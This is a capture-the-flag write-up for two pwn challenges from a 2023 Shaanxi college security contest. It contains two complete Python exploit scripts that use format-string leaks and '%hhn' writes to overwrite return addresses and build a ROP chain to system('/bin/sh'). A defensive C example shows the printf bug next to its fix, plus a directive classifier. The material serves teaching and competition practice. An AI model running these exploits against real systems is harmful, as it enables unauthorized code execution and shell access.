2023 Third Shaanxi Provincial College Student Cyber Security Skills Competition - pwn - may be all

Published: 2023-06-04 13:02:38  Author: 7resp4ss

2023 Third Shaanxi Provincial College Student Cyber Security Skills Competition - pwn - may be all?

Preface

The school team handed me two challenges. Both turned out to be easy, so I solved them quickly. I don't know their real names, so I'll just call them pwn1 and pwn2.

pwn1

A simple format-string leak. Apart from the stack offset of the variable being different inside the remote Docker container, there is nothing much to say. (The challenge author's Docker image may have been broken.)

#!/usr/bin/env python3
'''
Author:7resp4ss
Date:2023-06-03 13:55:30
Usage:
    Debug : python3 exp.py debug elf-file-path -t -b malloc
    Remote: python3 exp.py remote elf-file-path ip:port
'''

from pwncli import *
cli_script()


io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc

filename  = gift.filename # current filename
is_debug  = gift.debug # is debug or not 
is_remote = gift.remote # is remote or not
gdb_pid   = gift.gdb_pid # gdb pid if debug

sla('choice :','2')
# option 2 echoes our input through printf: '%19$p' reads the 19th argument
# slot, which holds a pointer to main (offset found by the author while debugging)
sla('Terra_Cotta_Warriors\n','%19$p')
leak_elf = int(rl()[:-1],16)
leak_ex2(leak_elf)
eb = leak_elf - elf.sym.main   # PIE base = leaked pointer minus main's offset in the ELF
leak_ex2(eb)
sla('choice :','1')
# option 1 lets us overwrite the saved return address at offset 40 of the input
sl(flat(
    {
        40:eb + 0x129a   # the author's target inside the binary (PIE base + 0x129a)
    }
))

ia()

pwn2

A simple format string bug. Go through the rbp chain, and, since the variable i and the return address into __libc_start_main sit on the same page, keep resetting the value of i while writing the ROP chain over the __libc_start_main return address; finally restore rbp. (Thinking about it now, using bss plus a modified rbp one could pivot the stack straight onto the bss segment, which might be a bit more convenient?)
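Both challenges hinge on the same bug class: untrusted input reaching printf as the format string, which gives pwn1 its '%19$p' pointer read and pwn2 its '%hhn'/'%n' memory writes. The following C program is an added example written from the defender's side; it is not code from this write-up or from the challenge binaries, and every function name and sample string in it is my own construction. It places the vulnerable printf(user) pattern beside its one-line fix, then adds two defence-in-depth helpers for code paths where the sink itself cannot be changed: a scanner that reports whether a string would read arguments or write memory if it ever reached a format sink, and an escaper that doubles every '%' so the text is inert.

```c
#include <stdio.h>
#include <string.h>

/* Vulnerable pattern (the bug class behind both challenges): untrusted input
 * becomes the format string, so "%19$p" reads stack slots and "%8$hhn" writes
 * through pointers found there. Kept only for contrast; never called here.
 * The pragmas silence -Wformat-security so the file also builds with -Werror. */
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wformat-security"
#pragma GCC diagnostic ignored "-Wformat-nonliteral"
void echo_vulnerable(const char *user) { printf(user); }
#pragma GCC diagnostic pop

/* Fix: the format string is a literal and user data is only an argument.
 * Returns the number of characters the hardened call produced. */
int echo_hardened(const char *user, char *out, size_t out_len) {
    return snprintf(out, out_len, "%s", user);
}

/* Defence in depth (hypothetical helper): walk the string the way printf's
 * parser does and report what it would do if it ever reached a format sink. */
enum { FMT_READ = 1, FMT_WRITE = 2 };

int classify_directives(const char *s) {
    int flags = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        p++;
        if (*p == '%') continue;            /* "%%" is a literal percent sign */
        /* skip flags, width, precision, positional '$' and length modifiers */
        while (*p && strchr("-+ #0123456789.$*hlLqjzt", *p)) p++;
        if (!*p) break;                     /* dangling '%' at end of string */
        if (*p == 'n') flags |= FMT_WRITE;  /* %n, %hn, %hhn, %8$hhn ... store a count to memory */
        else flags |= FMT_READ;             /* %p, %s, %x ... read arguments off the stack */
    }
    return flags;
}

/* Neutralise instead of reject (hypothetical helper): double every '%' so the
 * text stays inert even if it is later passed as a format. Returns the length
 * written; output is truncated rather than split in the middle of an escape. */
size_t escape_percent(const char *in, char *out, size_t out_len) {
    size_t n = 0;
    if (out_len == 0) return 0;
    for (; *in; in++) {
        size_t need = (*in == '%') ? 2 : 1;
        if (n + need >= out_len) break;     /* keep room for the terminator */
        out[n++] = *in;
        if (*in == '%') out[n++] = '%';
    }
    out[n] = '\0';
    return n;
}

int main(void) {
    /* constructed inputs mirroring the payload shapes seen in the write-up */
    const char *samples[] = { "%19$p", "%29$p-%8$p-", "%255c%8$hhn", "%10$n", "hello" };
    char buf[64];
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        int f = classify_directives(samples[i]);
        escape_percent(samples[i], buf, sizeof buf);
        printf("%-14s read=%d write=%d escaped=%s\n",
               samples[i], !!(f & FMT_READ), !!(f & FMT_WRITE), buf);
    }
    echo_hardened("%19$p", buf, sizeof buf);
    printf("hardened echo prints it verbatim: %s\n", buf);
    return 0;
}
```

The real fix is the literal format string; the two helpers only matter where you cannot touch the sink. Build-time checks catch the pattern earlier: gcc and clang warn with -Wformat -Wformat-security (and -Werror=format-security makes it fatal), and glibc's _FORTIFY_SOURCE=2 aborts at run time when a '%n' directive appears in a format string that lives in writable memory. Note that fortify does nothing about the read side, so a '%p' leak like pwn1's still works against a fortified binary; that is why the classifier reports reads and writes separately.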

#!/usr/bin/env python3
'''
Author:7resp4ss
Date:2023-06-03 14:06:17
Usage:
    Debug : python3 exp.py debug elf-file-path -t -b malloc
    Remote: python3 exp.py remote elf-file-path ip:port
'''

from pwncli import *
cli_script()


io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc

filename  = gift.filename # current filename
is_debug  = gift.debug # is debug or not 
is_remote = gift.remote # is remote or not
gdb_pid   = gift.gdb_pid # gdb pid if debug

def attack_8_bits(val,attack_addr,i_addr):
    # Write the value `val` to `attack_addr` one byte at a time (6 bytes cover a
    # canonical address). Stack slot 8 holds a saved rbp that points at slot 10,
    # so '%8$hhn' redirects the pointer in slot 10 and '%10$hhn' writes through it.
    for i in range(6):
        # '+' binds tighter than '&', so this is the low byte of (attack_addr + i)
        pd = flat(
        {
            0:'%'+str(attack_addr+i&0xff)+'c'+'%8$hhn',   # point slot 10 at the i-th target byte
            0x40:''
        },filler = '\x00'
        )
        sa('say?\n',pd)
        # note: a zero byte becomes '%0c', which still prints one character
        pd = flat(
        {
            0:'%'+str(val&0xff)+'c'+'%10$hhn',   # store the current low byte of val there
            0x40:''
        },filler = '\x00'
        )
        sa('say?\n',pd)
        sleep(0.05)
        pd = flat(
        {
            0:'%'+str(i_addr&0xff)+'c'+'%8$hhn',   # now point slot 10 at the loop counter i
            0x40:''
        },filler = '\x00'
        )
        sa('say?\n',pd)
        pd = flat(
        {
            0:'%10$n',   # nothing printed before it, so this stores 0 into i and the input loop keeps going
            0x40:''
        },filler = '\x00'
        )
        sa('say?\n',pd)
        val = val >> 8


pd = flat(
    {
        0x0:'TokameinE_is_the_best_pwner\x00\x00'   # answer to the first prompt
    },filler = '\x00'
)
sa('is?\n',pd)


pd = flat(
    {
        0:'%29$p-%8$p-',   # leak a libc pointer (slot 29) and a stack pointer (slot 8) in one read
    }
)
sa('say?\n',pd)
sleep(0.05)
leak_libc = int(ru('-')[:-1],16)
leak_ex2(leak_libc)
lb = leak_libc - 0x20840   # distance from the leaked pointer to the libc base (found by the author while debugging)
libc.address = lb
leak_ex2(lb)
leak_stack = int(ru('-')[:-1],16)
leak_ex2(leak_stack)
# stack offsets relative to the leaked pointer, located by the author in gdb
attack_stack = leak_stack + 0x98   # return address into __libc_start_main; the ROP chain goes here
ori_ebp = leak_stack + 0x90        # saved rbp that must be restored at the end
i_addr = leak_stack - 0x14         # the loop counter i

pop_rdi = CurrentGadgets.pop_rdi_ret()
attack_8_bits(pop_rdi,attack_stack,i_addr)                      # pop rdi ; ret
attack_8_bits(CurrentGadgets.bin_sh(),attack_stack+8,i_addr)    # address of "/bin/sh" in libc
attack_8_bits(libc.sym.system,attack_stack+0x10,i_addr)         # system


# restore the saved rbp's low byte so the function epilogue is sane again
pd = flat(
{
    0:'%'+str(ori_ebp&0xff)+'c'+'%8$hhn',
    0x40:''
},filler = '\x00'
)
sa('say?\n',pd)
for i in range(12):
    sa('say?\n',p64(0xdeadbeef))   # harmless input until i runs out and main returns into the chain
ia()